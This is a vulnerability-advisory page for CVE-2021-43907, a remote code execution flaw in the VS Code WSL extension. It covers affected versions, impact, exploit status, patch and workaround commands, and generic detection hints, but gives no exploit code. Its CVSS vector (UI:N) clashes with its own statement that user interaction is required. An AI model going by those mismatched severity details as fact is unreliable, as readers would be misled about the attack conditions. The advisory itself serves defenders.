Login Sign Up

CVE-2021-43907

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

This vulnerability in Visual Studio Code's WSL extension allows remote code execution when a user opens a malicious workspace file. It affects developers using VS Code with the WSL extension on Windows systems. Attackers can execute arbitrary code with the user's privileges by tricking them into opening a specially crafted workspace.

💻 Affected Systems

Products:
  • Visual Studio Code
  • Visual Studio Code WSL Extension
Versions: WSL extension versions prior to v0.58.2
Operating Systems: Windows 10, Windows 11
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WSL extension installed and enabled. Users must open a malicious workspace file to trigger exploitation.

📦 What is this software?

Windows Subsystem For Linux by Microsoft

View all CVEs affecting Windows Subsystem For Linux →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing attacker to execute arbitrary code, steal credentials, install malware, or pivot to other systems.

🟠

Likely Case

Attacker gains code execution in user context, potentially accessing sensitive development files, source code, and credentials.

🟢

If Mitigated

Limited impact with proper user awareness training and restricted permissions, though code execution still possible.

🌐 Internet-Facing: MEDIUM - Requires user interaction (opening malicious workspace) but can be delivered via email, downloads, or compromised websites.
🏢 Internal Only: MEDIUM - Internal spear-phishing or shared malicious workspaces could exploit this within organizations.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user interaction but is technically simple once malicious workspace is opened. Proof-of-concept code has been published.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: WSL extension v0.58.2 and later

Vendor Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43907

Restart Required: No

Instructions:

1. Open VS Code. 2. Go to Extensions view (Ctrl+Shift+X). 3. Search for 'WSL'. 4. Click Update if available, or uninstall/reinstall to get latest version. 5. Verify version is 0.58.2 or higher.

🔧 Temporary Workarounds

Disable WSL Extension

windows

Temporarily disable the WSL extension until patched

code --disable-extension ms-vscode-remote.remote-wsl

Restrict Workspace Files

all

Only open workspace files from trusted sources

🧯 If You Can't Patch

  • Disable WSL extension completely via VS Code settings or command line
  • Implement application whitelisting to block execution of unexpected processes from VS Code

🔍 How to Verify

Check if Vulnerable:

Check WSL extension version in VS Code Extensions view. If version is below 0.58.2, system is vulnerable.

Check Version:

code --list-extensions --show-versions | findstr remote-wsl

Verify Fix Applied:

Confirm WSL extension version is 0.58.2 or higher in Extensions view.

📡 Detection & Monitoring

Log Indicators:

  • Unusual process execution from VS Code
  • Suspicious workspace file openings
  • Unexpected network connections from code.exe

Network Indicators:

  • Outbound connections to suspicious domains from VS Code process
  • Unexpected download activity

SIEM Query:

Process Creation where ParentImage contains 'Code.exe' and CommandLine contains suspicious patterns

📊 Metadata

CVE ID: CVE-2021-43907
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Published: December 15, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON